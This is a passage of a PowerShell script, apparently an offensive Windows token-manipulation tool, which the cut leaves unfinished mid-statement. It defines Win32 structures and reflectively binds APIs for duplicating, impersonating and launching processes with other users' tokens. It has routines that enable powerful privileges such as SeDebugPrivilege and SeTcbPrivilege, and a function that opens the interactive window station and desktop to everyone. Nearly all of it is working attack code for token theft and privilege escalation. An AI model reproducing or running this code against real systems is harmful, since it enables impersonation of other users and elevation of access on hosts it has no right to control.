 $TypeBuilder.DefineField('cbReserved2', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpReserved2', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdInput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdOutput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdError', [IntPtr], 'Public') | Out-Null\n\t$STARTUPINFO = $TypeBuilder.CreateType()\n\n    #Struct PROCESS_INFORMATION\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('PROCESS_INFORMATION', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('hProcess', [IntPtr], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('hThread', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwProcessId', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwThreadId', [UInt32], 'Public') | Out-Null\n\t$PROCESS_INFORMATION = $TypeBuilder.CreateType()\n\n    #Struct TOKEN_ELEVATION\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_ELEVATION', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('TokenIsElevated', [UInt32], 'Public') | Out-Null\n\t$TOKEN_ELEVATION = $TypeBuilder.CreateType()\n\n    #Struct LUID_AND_ATTRIBUTES\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n    $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n    $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n\t\t\n    #Struct TOKEN_PRIVILEGES\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n    $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n    $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n\n    #Struct ACE_HEADER\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACE_HEADER', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('AceType', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceFlags', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceSize', [UInt16], 'Public') | Out-Null\n    $ACE_HEADER = $TypeBuilder.CreateType()\n\n    #Struct ACL\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACL', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('AclRevision', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sbz1', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AclSize', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceCount', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sbz2', [UInt16], 'Public') | Out-Null\n    $ACL = $TypeBuilder.CreateType()\n\n    #Struct ACE_HEADER\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACCESS_ALLOWED_ACE', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('Header', $ACE_HEADER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Mask', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('SidStart', [UInt32], 'Public') | Out-Null\n    $ACCESS_ALLOWED_ACE = $TypeBuilder.CreateType()\n\n    #Struct TRUSTEE\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('TRUSTEE', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('pMultipleTrustee', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('MultipleTrusteeOperation', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('TrusteeForm', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('TrusteeType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ptstrName', [IntPtr], 'Public') | Out-Null\n    $TRUSTEE = $TypeBuilder.CreateType()\n\n    #Struct EXPLICIT_ACCESS\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('EXPLICIT_ACCESS', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('grfAccessPermissions', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('grfAccessMode', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('grfInheritance', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Trustee', $TRUSTEE, 'Public') | Out-Null\n    $EXPLICIT_ACCESS = $TypeBuilder.CreateType()\n    ###############################\n\n\n    ###############################\n    #Win32Functions\n    ###############################\n    $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t$OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\n    $OpenProcessTokenAddr = Get-ProcAddress advapi32.dll OpenProcessToken\n\t$OpenProcessTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$OpenProcessToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessTokenAddr, $OpenProcessTokenDelegate)    \n\n    $GetTokenInformationAddr = Get-ProcAddress advapi32.dll GetTokenInformation\n\t$GetTokenInformationDelegate = Get-DelegateType @([IntPtr], $TOKEN_INFORMATION_CLASS, [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n\t$GetTokenInformation = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetTokenInformationAddr, $GetTokenInformationDelegate)    \n\n    $SetThreadTokenAddr = Get-ProcAddress advapi32.dll SetThreadToken\n\t$SetThreadTokenDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Bool])\n\t$SetThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetThreadTokenAddr, $SetThreadTokenDelegate)    \n\n    $ImpersonateLoggedOnUserAddr = Get-ProcAddress advapi32.dll ImpersonateLoggedOnUser\n\t$ImpersonateLoggedOnUserDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t$ImpersonateLoggedOnUser = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateLoggedOnUserAddr, $ImpersonateLoggedOnUserDelegate)\n\n    $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf\n\t$RevertToSelfDelegate = Get-DelegateType @() ([Bool])\n\t$RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate)\n\n    $LsaGetLogonSessionDataAddr = Get-ProcAddress secur32.dll LsaGetLogonSessionData\n\t$LsaGetLogonSessionDataDelegate = Get-DelegateType @([IntPtr], [IntPtr].MakeByRefType()) ([UInt32])\n\t$LsaGetLogonSessionData = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaGetLogonSessionDataAddr, $LsaGetLogonSessionDataDelegate)\n\n    $CreateProcessWithTokenWAddr = Get-ProcAddress advapi32.dll CreateProcessWithTokenW\n\t$CreateProcessWithTokenWDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool])\n\t$CreateProcessWithTokenW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessWithTokenWAddr, $CreateProcessWithTokenWDelegate)\n\n    $memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\n    $DuplicateTokenExAddr = Get-ProcAddress advapi32.dll DuplicateTokenEx\n\t$DuplicateTokenExDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$DuplicateTokenEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuplicateTokenExAddr, $DuplicateTokenExDelegate)\n\n    $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW\n\t$LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool])\n\t$LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate)\n\n    $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle\n\t$CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t$CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)\n\n    $LsaFreeReturnBufferAddr = Get-ProcAddress secur32.dll LsaFreeReturnBuffer\n\t$LsaFreeReturnBufferDelegate = Get-DelegateType @([IntPtr]) ([UInt32])\n\t$LsaFreeReturnBuffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaFreeReturnBufferAddr, $LsaFreeReturnBufferDelegate)\n\n    $OpenThreadAddr = Get-ProcAddress kernel32.dll OpenThread\n\t$OpenThreadDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t$OpenThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadAddr, $OpenThreadDelegate)\n\n    $OpenThreadTokenAddr = Get-ProcAddress advapi32.dll OpenThreadToken\n\t$OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n\t$OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n\n    $CreateProcessAsUserWAddr = Get-ProcAddress advapi32.dll CreateProcessAsUserW\n\t$CreateProcessAsUserWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool])\n\t$CreateProcessAsUserW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessAsUserWAddr, $CreateProcessAsUserWDelegate)\n\n    $OpenWindowStationWAddr = Get-ProcAddress user32.dll OpenWindowStationW\n    $OpenWindowStationWDelegate = Get-DelegateType @([IntPtr], [Bool], [UInt32]) ([IntPtr])\n    $OpenWindowStationW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenWindowStationWAddr, $OpenWindowStationWDelegate)\n\n    $OpenDesktopAAddr = Get-ProcAddress user32.dll OpenDesktopA\n    $OpenDesktopADelegate = Get-DelegateType @([String], [UInt32], [Bool], [UInt32]) ([IntPtr])\n    $OpenDesktopA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenDesktopAAddr, $OpenDesktopADelegate)\n\n    $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n    $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n    $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n\n    $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n    $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], $LUID.MakeByRefType()) ([Bool])\n    $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n\n    $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n    $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], $TOKEN_PRIVILEGES.MakeByRefType(), [UInt32], [IntPtr], [IntPtr]) ([Bool])\n    $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n\n    $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n    $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n    $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n\n    $GetSecurityInfoAddr = Get-ProcAddress advapi32.dll GetSecurityInfo\n    $GetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType()) ([UInt32])\n    $GetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetSecurityInfoAddr, $GetSecurityInfoDelegate)\n\n    $SetSecurityInfoAddr = Get-ProcAddress advapi32.dll SetSecurityInfo\n    $SetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32])\n    $SetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetSecurityInfoAddr, $SetSecurityInfoDelegate)\n\n    $GetAceAddr = Get-ProcAddress advapi32.dll GetAce\n    $GetAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([IntPtr])\n    $GetAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAceAddr, $GetAceDelegate)\n\n    $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW\n    $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool])\n    $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate)\n\n    $AddAccessAllowedAceAddr = Get-ProcAddress advapi32.dll AddAccessAllowedAce\n    $AddAccessAllowedAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr]) ([Bool])\n    $AddAccessAllowedAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AddAccessAllowedAceAddr, $AddAccessAllowedAceDelegate)\n\n    $CreateWellKnownSidAddr = Get-ProcAddress advapi32.dll CreateWellKnownSid\n    $CreateWellKnownSidDelegate = Get-DelegateType @([UInt32], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool])\n    $CreateWellKnownSid = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateWellKnownSidAddr, $CreateWellKnownSidDelegate)\n\n    $SetEntriesInAclWAddr = Get-ProcAddress advapi32.dll SetEntriesInAclW\n    $SetEntriesInAclWDelegate = Get-DelegateType @([UInt32], $EXPLICIT_ACCESS.MakeByRefType(), [IntPtr], [IntPtr].MakeByRefType()) ([UInt32])\n    $SetEntriesInAclW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetEntriesInAclWAddr, $SetEntriesInAclWDelegate)\n\n    $LocalFreeAddr = Get-ProcAddress kernel32.dll LocalFree\n    $LocalFreeDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n    $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate)\n\n    $LookupPrivilegeNameWAddr = Get-ProcAddress advapi32.dll LookupPrivilegeNameW\n    $LookupPrivilegeNameWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool])\n    $LookupPrivilegeNameW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeNameWAddr, $LookupPrivilegeNameWDelegate)\n    ###############################\n\n\n    #Used to add 64bit memory addresses\n    Function Add-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t#Add bytes\n\t\t\t\t[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t\t\n\t\t\t\tif (($Sum -band 0xFF00) -eq 0x100)\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot add bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\n\n    #Enable SeAssignPrimaryTokenPrivilege, needed to query security information for desktop DACL\n    function Enable-SeAssignPrimaryTokenPrivilege\n    {\t\n\t    [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke()\n\t    if ($ThreadHandle -eq [IntPtr]::Zero)\n\t    {\n\t\t    Throw \"Unable to get the handle to the current thread\"\n\t    }\n\t\t\n\t    [IntPtr]$ThreadToken = [IntPtr]::Zero\n\t    [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t    {\n\t\t\t    $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t\t\t\n\t\t\t    $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw ([ComponentModel.Win32Exception] $ErrorCode)\n\t\t    }\n\t    }\n\n        $CloseHandle.Invoke($ThreadHandle) | Out-Null\n\t\n        $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)\n        $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize)\n        $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n\n\t    $Result = $LookupPrivilegeValue.Invoke($null, \"SeAssignPrimaryTokenPrivilege\", [Ref] $LuidObject)\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n        $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize)\n        $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr)\n\n        $LuidAndAttributes.Luid = $LuidObject\n        $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\n        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES)\n        $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\t    $TokenPrivileges.PrivilegeCount = 1\n\t    $TokenPrivileges.Privileges = $LuidAndAttributes\n\n        $Global:TokenPriv = $TokenPrivileges\n\n\t    $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t    if ($Result -eq $false)\n\t    {\n            Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        $CloseHandle.Invoke($ThreadToken) | Out-Null\n    }\n\n\n    #Enable SeSecurityPrivilege, needed to query security information for desktop DACL\n    function Enable-Privilege\n    {\n        Param(\n            [Parameter()]\n            [ValidateSet(\"SeAssignPrimaryTokenPrivilege\", \"SeAuditPrivilege\", \"SeBackupPrivilege\", \"SeChangeNotifyPrivilege\", \"SeCreateGlobalPrivilege\",\n                \"SeCreatePagefilePrivilege\", \"SeCreatePermanentPrivilege\", \"SeCreateSymbolicLinkPrivilege\", \"SeCreateTokenPrivilege\",\n                \"SeDebugPrivilege\", \"SeEnableDelegationPrivilege\", \"SeImpersonatePrivilege\", \"SeIncreaseBasePriorityPrivilege\",\n                \"SeIncreaseQuotaPrivilege\", \"SeIncreaseWorkingSetPrivilege\", \"SeLoadDriverPrivilege\", \"SeLockMemoryPrivilege\", \"SeMachineAccountPrivilege\",\n                \"SeManageVolumePrivilege\", \"SeProfileSingleProcessPrivilege\", \"SeRelabelPrivilege\", \"SeRemoteShutdownPrivilege\", \"SeRestorePrivilege\",\n                \"SeSecurityPrivilege\", \"SeShutdownPrivilege\", \"SeSyncAgentPrivilege\", \"SeSystemEnvironmentPrivilege\", \"SeSystemProfilePrivilege\",\n                \"SeSystemtimePrivilege\", \"SeTakeOwnershipPrivilege\", \"SeTcbPrivilege\", \"SeTimeZonePrivilege\", \"SeTrustedCredManAccessPrivilege\",\n                \"SeUndockPrivilege\", \"SeUnsolicitedInputPrivilege\")]\n            [String]\n            $Privilege\n        )\n\n\t    [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke()\n\t    if ($ThreadHandle -eq [IntPtr]::Zero)\n\t    {\n\t\t    Throw \"Unable to get the handle to the current thread\"\n\t    }\n\t\t\n\t    [IntPtr]$ThreadToken = [IntPtr]::Zero\n\t    [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t    {\n\t\t\t    $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t\t\t\n\t\t\t    $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw ([ComponentModel.Win32Exception] $ErrorCode)\n\t\t    }\n\t    }\n\n        $CloseHandle.Invoke($ThreadHandle) | Out-Null\n\t\n        $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)\n        $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize)\n        $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n\n\t    $Result = $LookupPrivilegeValue.Invoke($null, $Privilege, [Ref] $LuidObject)\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n        $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize)\n        $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr)\n\n        $LuidAndAttributes.Luid = $LuidObject\n        $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\n        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES)\n        $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\t    $TokenPrivileges.PrivilegeCount = 1\n\t    $TokenPrivileges.Privileges = $LuidAndAttributes\n\n        $Global:TokenPriv = $TokenPrivileges\n\n        Write-Verbose \"Attempting to enable privilege: $Privilege\"\n\t    $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t    if ($Result -eq $false)\n\t    {\n            Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        $CloseHandle.Invoke($ThreadToken) | Out-Null\n        Write-Verbose \"Enabled privilege: $Privilege\"\n    }\n\n\n    #Change the ACL of the WindowStation and Desktop\n    function Set-DesktopACLs\n    {\n        Enable-Privilege -Privilege SeSecurityPrivilege\n\n        #Change the privilege for the current window station to allow full privilege for all users\n        $WindowStationStr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"WinSta0\")\n        $hWinsta = $OpenWindowStationW.Invoke($WindowStationStr, $false, $Win32Constants.ACCESS_SYSTEM_SECURITY -bor $Win32Constants.READ_CONTROL -bor $Win32Constants.WRITE_DAC)\n\n        if ($hWinsta -eq [IntPtr]::Zero)\n        {\n            Throw (New-Object ComponentModel.Win32Exception)\n        }\n\n        Set-DesktopACLToAllowEveryone -hObject $hWinsta\n        $CloseHandle.Invoke($hWinsta) | Out-Null\n\n        #Change the privilege for the current desktop to allow full privilege for all users\n        $hDesktop = $OpenDesktopA.Invoke(\"default\", 0, $false, $Win32Constants.DESKTOP_GENERIC_ALL -bor $Win32Constants.WRITE_DAC)\n        if ($hDesktop -eq [IntPtr]::Zero)\n        {\n            Throw (New-Object ComponentModel.Win32Exception)\n        }\n\n        Set-DesktopACLToAllowEveryone -hObject $hDesktop\n        $CloseHandle.Invoke($hDesktop) | Out-Null\n    }\n\n\n    function Set-DesktopACLToAllowEveryone\n    {\n        Param(\n            [IntPtr]$hObject\n            )\n\n        [IntPtr]$ppSidOwner = [IntPtr]::Zero\n        [IntPtr]$ppsidGroup = [IntPtr]::Zero\n        [IntPtr]$ppDacl = [IntPtr]::Zero\n        [IntPtr]$ppSacl = [IntPtr]::Zero\n        [IntPtr]$ppSecurityDescriptor = [IntPtr]::Zero\n        #0x7 is window station, change for other types\n        $retVal = 